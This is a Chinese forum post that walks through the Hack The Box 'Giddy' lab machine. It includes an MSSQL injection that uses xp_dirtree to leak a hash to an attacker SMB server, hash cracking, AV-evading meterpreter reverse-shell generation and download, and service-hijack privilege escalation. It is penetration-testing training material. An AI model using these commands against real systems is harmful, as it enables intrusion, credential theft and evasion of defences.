电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 2337 人浏览分享

HTB:Giddy渗透测试

[复制链接]
2337 0
基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能平台
环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透。
链接:https://www.hackthebox.eu/home/machines/profile/153
描述:

QQ截图20210625144922.png

前言

本次演练使用kali系统按照渗透测试的过程进行操作 在渗透前期通过信息收集获取到相应的目录
发现存在SQL注入,知道了使用了mssql数据库 通过xp_dirtree函数获取hash  获取到账号与密
码最终通过提权获取到root权限。

一、信息收集

1、靶机ip

IP地址为:10.10.10.104

QQ截图20210625145032.png

2、靶机端口与服务
  1. nmap -sT -sV -O -A 10.10.10.104
复制代码

QQ截图20210625145118.png

  1. PORT     STATE SERVICE       VERSION
  2. 80/tcp   open  http          Microsoft IIS httpd 10.0
  3. 443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
  4. 3389/tcp open  ms-wbt-server Microsoft Terminal Services
复制代码

2、网站信息收集
(1)查看80端口与443端口收集网站信息
发现都是同一张图片

QQ截图20210625145210.png

69.png

将图片拷贝下来使用steghide查看是否存在隐写
  1. steghide extract -sf giddy.jpg
复制代码

该图片不存在隐写

68.png

(2)目录扫描
  1. python3 dirsearch.py  -w /usr/share/wordlists/dirbuster/direct
  2. ory-list-2.3-medium.txt -u http://10.10.10.104/
复制代码

这里只列出了对本次渗透有用的目录

66.png

  1. /mvc
  2. /remote
复制代码

二、漏洞探测与利用

1、SQL注入

访问/mvc目录

这是一个商品列表点击之后会显示价格

62.png

看见这个url感觉可能存在SQL注入加一个 测试一下

61.png

报错使用sqlmap跑一下看看能否获取一些信息

60.png

通过sqlmap扫描得知使用的是mssql数据库已知该数据库存在堆叠注入并且
该数据库正在以DBMS运行着

59.png

可以使用 impacket-smbserver 通过xpdirtree函数连接到该服务获取到相应
的哈希最后使用john破解hash
  1. impacket-smbserver xb $(pwd)
  2. ;exec xp_dirtree '\\10.10.14.8\xb';--
  3. john --wordlist /usr/share/wordlists/rockyou.txt hash
复制代码

58.png

29.png

用户:GIDDY\Stacy
密码:xNnWo6272k7x
2、获取shell
查看/remote目录 这是一个登陆界面 可以使用获取到的密码账号尝试登陆
但是提示说我们是需要使用https进行登录

28.png

更换到https进行登录

26.png

三、提权

1、获取user.txt

登录之后发现这是一个powershell窗口可以运行命令

获取user.txt

22.png

2、提权

通过信息收集得知系统运行了unifivideo服务

21.png

通过谷歌得知这是一个视频监控服务

20.png

使用searchsploit查询可利用脚本

19.png

通过叙述可知在关闭开启该服务的时候会访问taskkill.exe 可以创建一个taskkill.exe
上传到该目录下 反弹shell

18.png

由于存在防病毒模块我们需要对给模块进行绕过 使用[Phantom-Evasion](https://github.com/oddc
od3/Phantom-Evasion)进行生成 这是一个个人感觉不错的工具
注:之前上传的被杀掉这里直接演示成功绕过的
  1. python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H
  2. 10.10.14.8 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.wi
  3. ndows.com:443 -f exe -o taskkill.exe
复制代码

16.png

本地开放8001端口 让taskkill.exe上传到靶机中
  1. python3 -m http.server 8001
  2. Invoke-WebRequest -o taskkill.exe http://10.10.14.8:8001/taskkill.exe
复制代码

一切准备就绪 使用msf监听端口

12.png

  1. use exploit/multi/handler
  2. set payload  windows/meterpreter/reverse_tcp
  3. set LHOST 10.10.14.8
  4. exploit
复制代码

关闭开启Ubiquiti UniFi Video服务
  1. Stop-Service "Ubiquiti UniFi Video"
  2. start-service unifivideoservice
复制代码

成功获取到shell

11.png

9.png

查看权限发现是系统权限

8.png

3、获取root.txt

6.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.